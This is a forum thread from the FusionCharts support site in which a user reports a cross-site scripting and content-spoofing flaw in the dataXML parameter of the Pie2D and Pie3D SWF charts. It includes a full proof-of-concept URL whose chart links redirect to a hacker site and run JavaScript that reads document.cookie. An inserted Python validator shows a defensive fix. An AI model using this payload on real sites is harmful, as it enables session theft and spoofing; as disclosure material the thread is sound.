Michelle, posted November 1, 2011: Is there any type of data validation that is performed for the dataXML parameter that is passed to the Pie2D.swf or Pie3D.swf files? We have concerns about the ability to pass malicious JavaScript in this parameter.
Guest Angshu, posted November 2, 2011: Hi, welcome to the FusionCharts Forum! Could you please elaborate on your query a bit more? It would be helpful if you could send us a screenshot or a live link of your requirement. Awaiting your response.
Michelle, posted November 2, 2011:
On 11/2/2011 at 5:08 AM, Angshu said: Hi, welcome to the FusionCharts Forum! Could you please elaborate on your query a bit more? It would be helpful if you could send us a screenshot or a live link of your requirement. Awaiting your response.
We are thinking the "dataXML" parameter used by Pie2D.swf and Pie3D.swf has Content Spoofing and Cross-Site Scripting vulnerabilities. It seems that it does not currently validate data passed to it and allows an attacker to alter any chart hosted within the current domain and include malicious JavaScript that will execute when a user interacts with the altered chart. Here is an example using Pie2D.swf. The same applies to Pie3D.swf. This is not a live example because I used fake domains.
https://your.domain.com/your/path/to/swf/Pie2D.swf?chartWidth=290&chartHeight=160&debugMode=0&DOMId=fusion_chart&registerWithJS=1&scaleMode=noScale&lang=EN&dataXML=%3Cchart%20caption=%27Security%20Assessment,%20Inc.%27%20subcaption=%22Fusion%20Chart%20Content%20Spoofing%20and%20XSS%22%20showPercentageInLabel=%271%27%20showValues=%270%27%20showLabels=%271%27%20showLegend=%271%27%3E%3Cset%20value=%2714.94%27%20label=%27Redirection%27%20color=%27429EAD%27%20link=%27http://www.hackersite.com%27/%3E%3Cset%20value=%2719.17%27%20label=%27XSS!%27%20color=%274249AD%27%20link=%22javascript:confirm%28%27Security%20Assessment,%20Inc.%5Cn%5CnAn%20attacker%20has%20just%20captured%20your%20session.%5Cn%5Cn%27%252bdocument.cookie%29%22/%3E%3Cset%20value=%277.14%27%20label=%27Key%20Lime%27%20color=%27AD42A2%27/%3E%3Cset%20value=%277.75%27%20label=%27Apple%27%20color=%27D4AC31%27/%3E%3C/chart%3E
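Not part of the thread, but the kind of server-side check the question above is asking about, written as an added Python example (not FusionCharts' code; host names and the `chart_url` helper are placeholders): it parses the dataXML before it is put into the SWF URL, allow-lists the chart/set elements, and refuses any link attribute that is not a plain relative path or an http(s) URL on an approved host, so a javascript: link never reaches the chart.

```python
"""Validate FusionCharts-style dataXML before embedding it in a chart URL.

Hypothetical helper: the application receives or builds the dataXML and must
refuse anything that can carry script through the chart's link attributes."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import quote, urlsplit

ALLOWED_HOSTS = {"your.domain.com"}      # constructed: hosts that links may target
ALLOWED_ELEMENTS = {"chart", "set"}      # the only elements a pie chart needs
HEX_COLOR = re.compile(r"^[0-9A-Fa-f]{6}$")


def link_is_safe(link: str) -> bool:
    """Accept only scheme-less relative paths or http(s) links to allowed hosts."""
    text = link.strip()
    parts = urlsplit(text)
    if parts.scheme == "" and parts.netloc == "":
        # Relative path; protocol-relative '//host' has a netloc and fails above.
        return True
    return parts.scheme.lower() in ("http", "https") and parts.hostname in ALLOWED_HOSTS


def validate_data_xml(data_xml: str) -> str:
    """Parse the dataXML and return a re-serialised copy, or raise ValueError.

    Unknown elements, unsafe links, non-numeric values and malformed colours are
    all rejected outright rather than repaired."""
    root = ET.fromstring(data_xml)
    for el in root.iter():
        if el.tag not in ALLOWED_ELEMENTS:
            raise ValueError(f"unexpected element <{el.tag}>")
        link = el.get("link")
        if link is not None and not link_is_safe(link):
            raise ValueError(f"disallowed link: {link!r}")
        if el.tag == "set":
            float(el.get("value", "0"))            # ValueError if not numeric
            color = el.get("color")
            if color is not None and not HEX_COLOR.match(color):
                raise ValueError(f"bad color: {color!r}")
    return ET.tostring(root, encoding="unicode")


def chart_url(swf_base: str, data_xml: str) -> str:
    """Build the SWF URL only from dataXML that passed validation, percent-encoded."""
    return swf_base + "?dataXML=" + quote(validate_data_xml(data_xml), safe="")
```

Rejecting is the safe default here; if an application relies on chart links that call page JavaScript, that has to be an explicit, separately reviewed allowance rather than anything this validator lets through.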
shaio, posted October 29, 2012: Hello, we are using your XT version and we have the same problem. Do you have any answer for that issue? Thanks.
On 11/2/2011 at 5:08 AM, Angshu said: Hi, welcome to the FusionCharts Forum! Could you please elaborate on your query a bit more? It would be helpful if you could send us a screenshot or a live link of your requirement. Awaiting your response.
Guest Sumedh, posted October 30, 2012: Hi, our Engineering team is currently working on this. We will get back to you on this as early as possible.